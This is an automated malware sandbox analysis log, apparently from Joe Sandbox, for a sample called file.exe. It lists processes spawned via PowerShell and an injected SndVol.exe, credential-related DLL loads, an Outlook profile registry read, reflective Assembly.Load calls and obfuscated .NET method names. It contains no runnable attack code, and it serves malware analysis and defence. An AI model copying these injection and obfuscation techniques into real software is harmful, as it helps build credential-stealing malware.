Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe | Process created: C:\Windows\SysWOW64\SndVol.exe "C:\Windows\SysWOW64\SndVol.exe"
Source: C:\Windows\SysWOW64\SndVol.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\file.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: SndVol.pdbGCTL source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3762337231.000000000075E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: file.exe, 00000004.00000002.1669747825.00000000016E0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1677267972.0000000004EEE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1669757476.0000000004D34000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.000000000523E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.00000000050A0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000004.00000002.1669747825.00000000016E0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, SndVol.exe, 00000009.00000003.1677267972.0000000004EEE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1669757476.0000000004D34000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.000000000523E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.00000000050A0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: SndVol.pdb source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3762337231.000000000075E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000000.1584029398.0000000000C0F000.00000002.00000001.01000000.0000000C.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000000.1745800573.0000000000C0F000.00000002.00000001.01000000.0000000C.sdmp

Data Obfuscation

Source: 0.2.file.exe.4079f58.0.raw.unpack, MainForm.cs | .Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.a7a0000.4.raw.unpack, rBxlgrxj8aX9QyCKGq.cs | .Net Code: icPUP4GWYY System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.4af1228.2.raw.unpack, rBxlgrxj8aX9QyCKGq.cs | .Net Code: icPUP4GWYY System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.4099f78.1.raw.unpack, MainForm.cs | .Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740AC98 push eax; iretd 0_2_0740AC99
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740C0D0 push cs; ret 0_2_0740C0D1
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00414C8A push edi; retf 1685h 4_2_00414C84
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004140F8 pushfd ; retf 4_2_00414115
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004088BC push 00000002h; iretd 4_2_004088D5
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00401959 push ds; ret 4_2_0040195A
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00414103 pushfd ; retf 4_2_00414115
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00402219 push cs; ret 4_2_00402225
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00404A35 push ss; iretd 4_2_00404A40
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00401345 pushad ; iretd 4_2_0040134A
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00414B0B pushad ; ret 4_2_00414B0E
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0040DB16 push edi; retf 4_2_0040DB17
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00403640 push eax; ret 4_2_00403642
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00424653 push ecx; iretd 4_2_0042465C
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0041867E push ecx; iretd 4_2_00418680
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004196F4 push ebp; iretd 4_2_00419715
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0041969C push esi; retf 4_2_0041969D
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00401F76 push ebp; iretd 4_2_00401F7F
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017109AD push ecx; mov dword ptr [esp], ecx 4_2_017109B6
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_050D09AD push ecx; mov dword ptr [esp], ecx 9_2_050D09B6
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030A6059 push esi; retf 9_2_030A605A
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030A60B1 push ebp; iretd 9_2_030A60D2
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030B0676 pushfd ; ret 9_2_030B0699
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030B0680 pushfd ; ret 9_2_030B0699
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030A0AB5 pushfd ; retf 9_2_030A0AD2
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030A0AC0 pushfd ; retf 9_2_030A0AD2
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030B0E1F push cs; retf 9_2_030B0EC5
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030B0E7E push cs; retf 9_2_030B0EC5
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030913F2 push ss; iretd 9_2_030913FD
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_03095279 push 00000002h; iretd 9_2_03095292
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030B1004 push ecx; iretd 9_2_030B1019
Source: file.exe | Static PE information: section name: .text entropy: 7.721476957591344
Source: 0.2.file.exe.a7a0000.4.raw.unpack, kXGl6TU9X1CLOkDJqb.cs | High entropy of concatenated method names: 'KdgVfp9oSD', 'Sx6Vx1ZbKA', 'K88VT6eFR1', 'PbBVObtw6d', 'nHFVdtYBOu', 'VhHV7bwi2v', 'vngcxQmEH2sHCjosax', 'yoBdM6sWa1VSxrjupO', 'b3HVVqWJrG', 'B4cV9buqfT'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, cOuKhHmbwi2vYGgxwN.cs | High entropy of concatenated method names: 'n6JlvNncx4', 'dNklSXUsOm', 'rWnlFMyYR2', 'gcalfHWggW', 'Us9lx0RiBC', 'kO2FabkHNW', 'LKiFK0hvHV', 'CnZF1wPUIk', 'cGAFYKeJca', 'oPrF2DmYgm'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, xrTuJGVU9taKf4nSoGX.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mMxhrughok', 'rFIhbXaMWp', 'LnkhAV197H', 'foMhhSxGdn', 'jbqhMG6bGM', 'XaUhnJfF5P', 'vouh0G3lRh'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, IB2k7n2T1BIPg3qqH6.cs | High entropy of concatenated method names: 'OOTrmDot8b', 'qWQrjGruXb', 'gXDr691vE4', 'tx0rLxWBmH', 'bsYr3vJQQ9', 'DPyrG0uSi2', 'Xc9rHZMl5d', 'cjHrkrtEHk', 'w1frcYtSk4', 'ut1ru3VS9s'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, KSBNsrKqTq8oFUpqsh.cs | High entropy of concatenated method names: 'Q6P8YB4dus', 'NSX8ISddMp', 'Y77CRKpTBd', 'mrACVdl1XE', 'i0s8gBNLPS', 'ukc8XcEFOM', 'zS28wdOaCy', 'xMb8WnDMeg', 'BHa8eKhABY', 'l278o0QJk8'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, voKxv5Ev4EKeqhjyDs.cs | High entropy of concatenated method names: 'afA8TnFYto', 'XbK8ODFoAf', 'ToString', 'Jv28qWvHsi', 'zl08SoCrrh', 'dun8yk2Lxm', 'nd08FS0Ipq', 'mVx8lYH6b0', 'bJe8fB4tH7', 'RDP8xxdSN9'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, aO7fhHWYjBhdXIOiYt.cs | High entropy of concatenated method names: 'GFtdu8VsP4', 'lONdXWSErg', 'la7dWnbK6g', 'DV6deqmRmh', 'EgfdjJZ1wJ', 'k9xd63GP1u', 'BCqdLCm2fs', 'XC2d3Fk6s0', 'kq7dGXrFOv', 'KohdHHHyJM'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, Y8vCQs10HAf48hdxB9.cs | High entropy of concatenated method names: 'ygKrdN36Ws', 'kVxr83oDjN', 'F64rrekcma', 'EtlrA13Tpi', 'vSTrM6mDOL', 'hxrr0VrBfA', 'Dispose', 'tsQCqvffpW', 'TxLCSix1kF', 'g76CyYqYmd'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, OHyVr6VBoFwV6wMCpsU.cs | High entropy of concatenated method names: 'ToString', 'NA8AQVue1D', 'FhFAs9qyyl', 'GYZAJP3o4c', 'vwMAmston7', 'ow9AjIwHIm', 'wsMA609EEl', 'dOHALN9djH', 'hYlSGghN3bSWyrfvoNX', 'fgw3T3h6YU410KEkaY3'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, cLoHjTw0PFUAEUVPUB.cs | High entropy of concatenated method names: 'lHipQZvFaE', 'drhpsN8NmE', 'X3ppmr2PYh', 'dPxpjm4fB8', 'ww0pLqkQcs', 'd2Gp3U6Nin', 'G7DpHoVWiX', 'm5Mpk5GVss', 'GUopuCkukx', 'U2PpgLHolu'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, W3YGtBooICT50ZBVlf.cs | High entropy of concatenated method names: 'ToString', 'ns67gUvavC', 'y9U7jS0pGG', 'Pd976ZU1mE', 'rH47LIkjJQ', 'zmN73eooPy', 'Qgl7GlNAaC', 'FtH7H4Mhhx', 'L2v7kkOCpa', 'JS27cCnjIF'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, EGDBtjBVZVVPdpw7hW.cs | High entropy of concatenated method names: 'rWEPMErm9', 'XXIt1EI3A', 'bTOZxRwRq', 'yCj4FUGxT', 'mqCsMsYT8', 'zgeJlPhp7', 'j6XKWQJPPoDaBM8BOk', 'xLSYpvXxvMsLNGI1OD', 'FNBCnr5MO', 'aAIb4E0Oj'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, Qn6sd0I6oYNvA1mufo.cs | High entropy of concatenated method names: 'zTabyWutwG', 'YKcbFV4Bgd', 'qwSblFWmx0', 'Njvbfg9XRS', 'QXpbriDTk1', 'SSlbx5uw5E', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, GMw5ScVV0XG8ZuIyI8B.cs | High entropy of concatenated method names: 'QAGbI7nP0M', 'UY2bz4psZd', 'rTHARGHjZJ', 'a94AVvYrow', 'ohVABtgFmn', 'Dk4A9xkfE0', 't92AUpZQxU', 'Q35AvwPfXg', 'OaLAqp670X', 'CQ9ASZ74sH'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, rBxlgrxj8aX9QyCKGq.cs | High entropy of concatenated method names: 'pVO9vq3pT6', 'VB39qhQBD0', 'DKY9SlaPwN', 'jMF9yXTZKA', 'l0G9FU0F2q', 'FWT9l31jA4', 'qEv9fLttdt', 'fWw9xA1RyM', 'vcq9NFHgpu', 'ibQ9TYCjHQ'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, Op9oSDQex61ZbKAB8f.cs | High entropy of concatenated method names: 'CsTSW6m5qN', 'JQdSeiX3M8', 'QUBSoXH9wZ', 'MZSSEvw0al', 'gtqSaODao1', 'GIkSKBFMgq', 'vvfS1B3Ent', 'QDPSYS0mh7', 'smwS2qH817', 'IJsSIm0fLd'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, xoqIiWzLh8kdieGeYX.cs | High entropy of concatenated method names: 'FIfbZOyCTh', 'N1BbQxTmG7', 'vupbsFwyAK', 'qDEbmHCHBP', 'T8jbjnj9yi', 'O5RbL539qV', 'oFKb3I1kLB', 'wOWb0Qc77X', 'lwvbiw6jyf', 'Gk7bDaBmKK'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, mx5JvpHWsXgly5CUUg.cs | High entropy of concatenated method names: 'MTvfq2GbCO', 'r3xfypLjuM', 'KS8flPH3Ub', 'xaElInIY66', 'UialzDNBjH', 'tS8fRJIPT8', 'Cb9fVJCMxF', 'UOTfBPfEmO', 'OXrf9nSQAX', 'ewbfUI58FN'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, cOBf4lc7MGSjVT9qOP.cs | High entropy of concatenated method names: 'ua4ficB8g2', 'PJbfDOlP3q', 'YxGfPSrmCM', 'g5MftNvpmx', 'ffIf5XEHIM', 'LEbfZWotj3', 'lJXf4F8DsH', 'wS4fQTfR2V', 'CI9fsrMYAi', 'bQpfJA8hFY'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, Aw6dcyJcW2PR2pHFtY.cs | High entropy of concatenated method names: 'eHKF5xsF99', 'w2JF4KrfU5', 'mqMy6bEKCB', 'XUPyLWrltC', 'bNky30WyTw', 'pX4yGi5J09', 'yHeyHLBwEW', 'AQsykio5LW', 'fDAyc6tteq', 'dZVyu0iLny'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, ABIClGs886eFR1wbBb.cs | High entropy of concatenated method names: 'LbFytTdoNq', 'QE8yZmbbKJ', 'MFZyQ3SGLL', 'hoAysS88dc', 'KpdydIA82b', 'y2hy7ySQdM', 'XVZy8IHo2R', 'My9yCXKZit', 'F7NyriG7Na', 'OvQybGSAd4'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, sMG1qLVRNO0QDq6n28l.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OW3bgp9Q85', 'NlobXPVd9O', 'NDtbwJnIOO', 'YgPbWRQNgp', 'gtLbelnlyB', 'acEboiwNLU', 'RKCbESUWqD'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, tJaLrcGPKgemqKlDZQ.cs | High entropy of concatenated method names: 'PGvloMXNft', 'Cm2lEFCSH2', 'YVOlaL5tD9', 'ToString', 'kNdlKTyDWv', 'zmyl1GrBME', 'OLG5ybukF2gPg78wTvq', 'PSFCiLuKJMsXDJM9Ydi', 'HUY4DQuIWWAQDmBlUKO'
Source: 0.2.file.exe.a7a0000.4.raw.unpack, tCgYVqSESRwHbwGTvM.cs | High entropy of concatenated method names: 'Dispose', 'tf4V28hdxB', 'DxjBjYTqNO', 'VBEVmgORw8', 'dD3VIIYOSm', 'NlwVzAmCHn', 'ProcessDialogKey', 'iwLBRB2k7n', 'm1BBVIPg3q', 'fH6BBwn6sd'
Source: 0.2.file.exe.4af1228.2.raw.unpack, kXGl6TU9X1CLOkDJqb.cs | High entropy of concatenated method names: 'KdgVfp9oSD', 'Sx6Vx1ZbKA', 'K88VT6eFR1', 'PbBVObtw6d', 'nHFVdtYBOu', 'VhHV7bwi2v', 'vngcxQmEH2sHCjosax', 'yoBdM6sWa1VSxrjupO', 'b3HVVqWJrG', 'B4cV9buqfT'
Source: 0.2.file.exe.4af1228.2.raw.unpack, cOuKhHmbwi2vYGgxwN.cs | High entropy of concatenated method names: 'n6JlvNncx4', 'dNklSXUsOm', 'rWnlFMyYR2', 'gcalfHWggW', 'Us9lx0RiBC', 'kO2FabkHNW', 'LKiFK0hvHV', 'CnZF1wPUIk', 'cGAFYKeJca', 'oPrF2DmYgm'
